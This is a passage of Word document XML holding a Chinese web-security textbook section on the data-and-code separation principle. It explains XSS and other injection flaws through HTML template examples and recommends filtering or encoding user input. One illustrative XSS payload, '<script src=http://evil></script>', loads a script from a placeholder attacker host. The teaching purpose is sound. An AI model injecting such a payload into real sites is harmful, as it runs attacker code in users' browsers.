        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250002" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>数据与代码分离原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="203" w:right="169" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>另一个重要的安全原则是数据与代码分离原则。这一原则广泛适用于各种由于“注入”而引发安全问题的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="146"/>
        <w:ind w:left="203" w:right="163" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>实际上，缓冲区溢出，也可以认为是程序违背了这一原则的后果——程序在栈或者堆中， 将用户数据当做代码执行，混淆了代码与数据的边界，从而导致安全问题的发生。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="202" w:right="120" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-28"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>安全中，由“注入”引起的问题比比皆是，如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-34"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-32"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CRLF Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>X-Path Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>等。此类问题均可以根据“数据与代码分离原则”设计出真正安全的解决方案， 因为这个原则抓住了漏洞形成的本质原因。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:44.506012pt;width:411.15pt;height:57pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2968;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="1"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;html&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;head&gt;test&lt;/head&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="9"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:b/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:b/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>$var</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="9"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/html&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>为例，它产生的原因是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>，如果一个页面的代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="77"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>其中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>$var </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>是用户能够控制的变量，那么对于这段代码来说：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.904375pt;width:411.15pt;height:57pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:2992;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="1"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;html&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;head&gt;test&lt;/head&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="9"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="BodyText"/>
                    <w:spacing w:before="5"/>
                    <w:rPr>
                      <w:sz w:val="15"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="11"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/html&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="444" w:lineRule="auto" w:before="140"/>
        <w:ind w:left="603" w:right="6187" w:hanging="401"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>就是程序的代码执行段。而</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="123" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>$var</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>就是程序的用户数据片段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="144"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:bookmarkStart w:name="1.7.4  不可预测性原则" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>如果把用户数据片段 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>$var </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>当成代码片段来解释、执行，就会引发安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="603"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>比如，当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>$var </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的值是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="159"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="46"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Courier New"/>
            <w:sz w:val="16"/>
            <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
          </w:rPr>
          <w:t>src=http://evil&gt;</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>时，用户数据就被注入到代码片段中。解析这段脚本并执行的过程，是由浏览器来完成的—— </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>浏览器将用户数据里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>标签当做代码来解释——这显然不是程序开发者的本意。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="202" w:right="223" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>根据数据与代码分离原则，在这里应该对用户数据片段 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>$var </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>进行安全处理，可以使用过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>滤、编码等手段，把可能造成代码混淆的用户数据清理掉，具体到这个案例中，就是针对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-32"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>等符号做处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>有的朋友可能会问了：我这里就是要执行一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>cr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>标签，要弹出一段文字，比如：“你</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>好！”，那怎么办呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="166"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:45.54599pt;width:411.15pt;height:76pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3016;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="1"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;html&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;head&gt;test&lt;/head&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="9"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="252" w:lineRule="auto" w:before="10"/>
                    <w:ind w:left="28" w:right="6734" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;script&gt; alert("$var1");</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="180" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/script&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="9"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/html&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>在这种情况下，数据与代码的情况就发生了变化，根据数据与代码分离原则，我们就应该   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>重写代码片段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="202" w:right="125" w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>标签也变成了代码片段的一部分，用户数据只有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>$var1 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>能够控制， 从而杜绝了安全问题的发生。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1052" w:val="left" w:leader="none"/>
          <w:tab w:pos="1053" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1052" w:right="0" w:hanging="849"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250001" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>不可预测性原则</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="328" w:lineRule="auto" w:before="229"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>前面介绍的几条原则：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
